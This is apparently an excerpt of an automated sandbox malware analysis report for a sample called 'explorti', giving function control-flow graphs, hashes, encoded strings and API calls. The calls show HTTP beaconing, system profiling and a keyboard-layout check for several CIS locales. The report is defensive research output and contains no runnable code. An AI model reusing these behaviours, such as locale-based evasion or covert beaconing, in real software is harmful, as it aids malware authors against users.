                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                      • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$invalid stoi argument$stoi argument out of range
                      • API String ID: 4201286991-368581918
                      • Opcode ID: 935de888c671147ff3023924fdc21e1c4a89c6820005f682e66bd950d3b4d097
                      • Instruction ID: cfebc8424ddd4c07f56d553b6582c5859a44234d5d79b8df8fb9f5e29d0e455c
                      • Opcode Fuzzy Hash: 935de888c671147ff3023924fdc21e1c4a89c6820005f682e66bd950d3b4d097
                      • Instruction Fuzzy Hash: 31230771E002488BEB19DB28CD4579DBBB69B8A304F5491D8E049BF2C2DB75AF84CF51
                      Function 00EA4690 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EA7840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00EA792C
                        • Part of subcall function 00EA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00EA7938
                        • Part of subcall function 00EA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00EA7941
                        • Part of subcall function 00E9BD30: InternetOpenW.WININET(00EE8D18,00000000,00000000,00000000,00000000), ref: 00E9BDBC
                        • Part of subcall function 00E9BD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00E9BDE1
                        • Part of subcall function 00E9BD30: HttpOpenRequestA.WININET(?,00000000), ref: 00E9BE2A
                      • std::_Xinvalid_argument.LIBCPMT ref: 00EA4E72
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$stoi argument out of range$k
                      • API String ID: 2414744145-103956707
                      • Opcode ID: 4019fa345c9c0e22695af51e199aa18a979dd328ecab3ea470bb9ab384705190
                      • Instruction ID: dc30b81149382fe35931f796c01e925397ba0fe45003a5eee9087e003f4b5693
                      • Opcode Fuzzy Hash: 4019fa345c9c0e22695af51e199aa18a979dd328ecab3ea470bb9ab384705190
                      • Instruction Fuzzy Hash: 9E232571E002588BEB19DB28CD8579DBBB29B8A304F5491D8E049BF2C2DB756F84CF51
                      Function 00E97CE0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 392COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1787 e97ce0-e97d62 call ec4000 1791 e97d68-e97d90 call ea7840 call e95b00 1787->1791 1792 e9825e-e9827b call eacef4 1787->1792 1799 e97d92 1791->1799 1800 e97d94-e97db6 call ea7840 call e95b00 1791->1800 1799->1800 1805 e97db8 1800->1805 1806 e97dba-e97dd3 1800->1806 1805->1806 1809 e97dd5-e97de4 1806->1809 1810 e97e04-e97e2f 1806->1810 1811 e97dfa-e97e01 call ead569 1809->1811 1812 e97de6-e97df4 1809->1812 1813 e97e31-e97e40 1810->1813 1814 e97e60-e97e81 1810->1814 1811->1810 1812->1811 1819 e9827c call ec6b7a 1812->1819 1815 e97e42-e97e50 1813->1815 1816 e97e56-e97e5d call ead569 1813->1816 1817 e97e83-e97e85 GetNativeSystemInfo 1814->1817 1818 e97e87-e97e8c 1814->1818 1815->1816 1815->1819 1816->1814 1822 e97e8d-e97e96 1817->1822 1818->1822 1829 e98281-e98286 call ec6b7a 1819->1829 1827 e97e98-e97e9f 1822->1827 1828 e97eb4-e97eb7 1822->1828 1830 e98259 1827->1830 1831 e97ea5-e97eaf 1827->1831 1832 e97ebd-e97ec6 1828->1832 1833 e981ff-e98202 1828->1833 1830->1792 1836 e98254 1831->1836 1837 e97ed9-e97edc 1832->1837 1838 e97ec8-e97ed4 1832->1838 1833->1830 1839 e98204-e9820d 1833->1839 1836->1830 1840 e981dc-e981de 1837->1840 1841 e97ee2-e97ee9 1837->1841 1838->1836 1842 e9820f-e98213 1839->1842 1843 e98234-e98237 1839->1843 1850 e981ec-e981ef 1840->1850 1851 e981e0-e981ea 1840->1851 1844 e97fc9-e981c5 call ea7840 call e95b00 call ea7840 call e95b00 call e95c40 call ea7840 call e95b00 call e95620 call ea7840 call e95b00 call ea7840 call e95b00 call e95c40 call ea7840 call e95b00 call e95620 call ea7840 call e95b00 call ea7840 call e95b00 call e95c40 call ea7840 call e95b00 call e95620 1841->1844 1845 e97eef-e97f4b call ea7840 call e95b00 call ea7840 call e95b00 call e95c40 1841->1845 1846 e98228-e98232 1842->1846 1847 e98215-e9821a 1842->1847 1848 e98239-e98243 1843->1848 1849 e98245-e98251 1843->1849 1886 e981cb-e981d4 1844->1886 1873 e97f50-e97f57 1845->1873 1846->1830 1847->1846 1853 e9821c-e98226 1847->1853 1848->1830 1849->1836 1850->1830 1855 e981f1-e981fd 1850->1855 1851->1836 1853->1830 1855->1836 1875 e97f59 1873->1875 1876 e97f5b-e97f7b call ec8a61 1873->1876 1875->1876 1881 e97f7d-e97f8c 1876->1881 1882 e97fb2-e97fb4 1876->1882 1884 e97f8e-e97f9c 1881->1884 1885 e97fa2-e97faf call ead569 1881->1885 1882->1886 1887 e97fba-e97fc4 1882->1887 1884->1829 1884->1885 1885->1882 1886->1833 1891 e981d6 1886->1891 1887->1886 1891->1840
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E97E83
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: 0k$McsqLc==$McsqMM==$McsrKc==$PGm$Xk
                      • API String ID: 1721193555-4201006178
                      • Opcode ID: 3c8f4b6a02eac5c6fedb3ef1c702d7fd6bdf32dd98ceb5001a11efa4dd81a730
                      • Instruction ID: 2f81ab7d1bd0f615153022daedf9d053e8705fcc98aebbb37f10d50ee3204233
                      • Opcode Fuzzy Hash: 3c8f4b6a02eac5c6fedb3ef1c702d7fd6bdf32dd98ceb5001a11efa4dd81a730
                      • Instruction Fuzzy Hash: CFD11771E006149BDF24EB28DD463AD7BB1AB86314F90628CE455BB3D2EB745E84C7C2
                      Function 00E95DD0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1925 e95dd0-e95ece 1931 e95ef8-e95f05 call eacef4 1925->1931 1932 e95ed0-e95edc 1925->1932 1933 e95eee-e95ef5 call ead569 1932->1933 1934 e95ede-e95eec 1932->1934 1933->1931 1934->1933 1936 e95f06-e9608d call ec6b7a call eae060 call ea7f00 * 5 RegOpenKeyExA 1934->1936 1954 e96458-e96461 1936->1954 1955 e96093-e96123 call ec4000 1936->1955 1956 e9648e-e96497 1954->1956 1957 e96463-e9646e 1954->1957 1985 e96129-e9612d 1955->1985 1986 e96446-e96452 1955->1986 1961 e96499-e964a4 1956->1961 1962 e964c4-e964cd 1956->1962 1959 e96470-e9647e 1957->1959 1960 e96484-e9648b call ead569 1957->1960 1959->1960 1964 e9657e-e96583 call ec6b7a 1959->1964 1960->1956 1966 e964ba-e964c1 call ead569 1961->1966 1967 e964a6-e964b4 1961->1967 1968 e964fa-e96503 1962->1968 1969 e964cf-e964da 1962->1969 1966->1962 1967->1964 1967->1966 1973 e9652c-e96535 1968->1973 1974 e96505-e96510 1968->1974 1970 e964dc-e964ea 1969->1970 1971 e964f0-e964f7 call ead569 1969->1971 1970->1964 1970->1971 1971->1968 1982 e96562-e9657d call eacef4 1973->1982 1983 e96537-e96546 1973->1983 1980 e96522-e96529 call ead569 1974->1980 1981 e96512-e96520 1974->1981 1980->1973 1981->1964 1981->1980 1990 e96558-e9655f call ead569 1983->1990 1991 e96548-e96556 1983->1991 1992 e96440 1985->1992 1993 e96133-e96167 RegEnumValueW 1985->1993 1986->1954 1990->1982 1991->1964 1991->1990 1992->1986 1994 e9642d-e96434 1993->1994 1995 e9616d-e9618d 1993->1995 1994->1993 2001 e9643a 1994->2001 2000 e96190-e96199 1995->2000 2000->2000 2003 e9619b-e9622d call ea7c20 call ea8350 call ea7840 * 2 call e95c40 2000->2003 2001->1992 2003->1994
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: b50d75662c1f5da913f5cbbeaf2979ab059ddb0cd7044d39d8e05c5ef62d6421
                      • Instruction ID: aa7e876e68033c7cb2e21adb45d06eb5b16e63cca23e8fb33d56c1b5c1bc9864
                      • Opcode Fuzzy Hash: b50d75662c1f5da913f5cbbeaf2979ab059ddb0cd7044d39d8e05c5ef62d6421
                      • Instruction Fuzzy Hash: 03E1AA71904218ABEF25DBA4CC88BDEB7B9EB05304F5042D9E409BB291DB74ABC4CF51
                      Function 00E98290 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2094 e98290-e98311 call ec4000 2098 e9831d-e98345 call ea7840 call e95b00 2094->2098 2099 e98313-e98318 2094->2099 2107 e98349-e9836b call ea7840 call e95b00 2098->2107 2108 e98347 2098->2108 2100 e9845f-e9847b call eacef4 2099->2100 2113 e9836d 2107->2113 2114 e9836f-e98388 2107->2114 2108->2107 2113->2114 2117 e983b9-e983e4 2114->2117 2118 e9838a-e98399 2114->2118 2119 e98411-e98432 2117->2119 2120 e983e6-e983f5 2117->2120 2121 e9839b-e983a9 2118->2121 2122 e983af-e983b6 call ead569 2118->2122 2125 e98438-e9843d 2119->2125 2126 e98434-e98436 GetNativeSystemInfo 2119->2126 2123 e98407-e9840e call ead569 2120->2123 2124 e983f7-e98405 2120->2124 2121->2122 2127 e9847c-e98481 call ec6b7a 2121->2127 2122->2117 2123->2119 2124->2123 2124->2127 2131 e9843e-e98445 2125->2131 2126->2131 2131->2100 2136 e98447-e9844f 2131->2136 2137 e98458-e9845b 2136->2137 2138 e98451-e98456 2136->2138 2137->2100 2139 e9845d 2137->2139 2138->2100 2139->2100
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00E98434
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: 0k$Xk
                      • API String ID: 1721193555-2312125285
                      • Opcode ID: 7cc3b06a304cc71872d7bb3ab4fa5b8bd80084da613ad35846b7e26a8824914d
                      • Instruction ID: 7f2091ee0a8176b3ee25c62f3cf09ca26d31d1f62c4ca4208eb36f37c27b9cc8
                      • Opcode Fuzzy Hash: 7cc3b06a304cc71872d7bb3ab4fa5b8bd80084da613ad35846b7e26a8824914d
                      • Instruction Fuzzy Hash: 2E512671D002189BEF24EB38CE457EDB7B5DF46304F5052A9E814BB291EF359E808B91
                      Function 00EC6DE1 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2140 ec6de1-ec6e16 GetFileType 2141 ec6e1c-ec6e27 2140->2141 2142 ec6ece-ec6ed1 2140->2142 2145 ec6e49-ec6e65 call ec4000 GetFileInformationByHandle 2141->2145 2146 ec6e29-ec6e3a call ec7157 2141->2146 2143 ec6efa-ec6f22 2142->2143 2144 ec6ed3-ec6ed6 2142->2144 2149 ec6f3f-ec6f41 2143->2149 2150 ec6f24-ec6f37 2143->2150 2144->2143 2147 ec6ed8-ec6eda 2144->2147 2155 ec6eeb-ec6ef8 call ec73ed 2145->2155 2162 ec6e6b-ec6ead call ec70a9 call ec6f51 * 3 2145->2162 2158 ec6ee7-ec6ee9 2146->2158 2159 ec6e40-ec6e47 2146->2159 2154 ec6edc-ec6ee1 call ec7423 2147->2154 2147->2155 2153 ec6f42-ec6f50 call eacef4 2149->2153 2150->2149 2163 ec6f39-ec6f3c 2150->2163 2154->2158 2155->2158 2158->2153 2159->2145 2176 ec6eb2-ec6eca call ec7076 2162->2176 2163->2149 2176->2149 2179 ec6ecc 2176->2179 2179->2158
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00EC6E03
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00EC6E5D
                      • __dosmaperr.LIBCMT ref: 00EC6EF2
                        • Part of subcall function 00EC7157: __dosmaperr.LIBCMT ref: 00EC718C
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: bc54d08ec31c952b37285a392e94ecae9ef9f9cba4a292a19fc32d4c5dfbc397
                      • Instruction ID: 39665dce8169e0bbf94d9075236b0718769f477301a72644c3a47e9022165a22
                      • Opcode Fuzzy Hash: bc54d08ec31c952b37285a392e94ecae9ef9f9cba4a292a19fc32d4c5dfbc397
                      • Instruction Fuzzy Hash: 23416D75900244AFDB24DFB5D941EAFB7F9EF88304B10542EF856E3610DB32A906CB61
                      Function 00EA6AB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: k
                      • API String ID: 3472027048-2690311395
                      • Opcode ID: 2de3b4f6effb53b9ba360c865e2c4e06e5b9b021af196a781d72b8dcd44c3aa3
                      • Instruction ID: 100cd41d582a96e095f53256278532c1bfe01ca4791e9ad0ee1e176cd68da94d
                      • Opcode Fuzzy Hash: 2de3b4f6effb53b9ba360c865e2c4e06e5b9b021af196a781d72b8dcd44c3aa3
                      • Instruction Fuzzy Hash: 10F08671A00614ABC711BB798D0771E7BA5E747720F841259E9117B2D1EBB42A1487D2
                      Function 00EC6C79 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2287 ec6c79-ec6c85 2288 ec6ca4-ec6cc8 call ec4000 2287->2288 2289 ec6c87-ec6ca3 call ec7410 call ec7423 call ec6b6a 2287->2289 2295 ec6cca-ec6ce4 call ec7410 call ec7423 call ec6b6a 2288->2295 2296 ec6ce6-ec6d08 CreateFileW 2288->2296 2319 ec6d52-ec6d56 2295->2319 2298 ec6d18-ec6d1f call ec6d57 2296->2298 2299 ec6d0a-ec6d0e call ec6de1 2296->2299 2310 ec6d20-ec6d22 2298->2310 2306 ec6d13-ec6d16 2299->2306 2306->2310 2312 ec6d44-ec6d47 2310->2312 2313 ec6d24-ec6d41 call ec4000 2310->2313 2314 ec6d49-ec6d4f 2312->2314 2315 ec6d50 2312->2315 2313->2312 2314->2315 2315->2319
                      Memory Dump Source
                      • Source File: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00E90000, based on PE: true
                      • Associated: 00000007.00000002.2881011740.0000000000E90000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881028373.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881083170.0000000000EF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000000EFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001156000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001185000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881101334.000000000119E000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881346985.000000000119F000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881451190.000000000133A000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881467711.000000000133B000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881481711.000000000133C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000007.00000002.2881496630.000000000133D000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_e90000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69fad8a52b50d5c577f234d774a0b140145e39e3bb0e13c2d081d48dfb90764a
                      • Instruction ID: e6dbaa942c22824a37114ccc748130e6717fc50a6e4a571689d771c399a8ba6a
                      • Opcode Fuzzy Hash: 69fad8a52b50d5c577f234d774a0b140145e39e3bb0e13c2d081d48dfb90764a
                      • Instruction Fuzzy Hash: 2921F871A052087AEB117B64AE42F9F3B69AF4137CF201318F9353B1D1DB729D0796A1
                      Function 00EC6F51 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
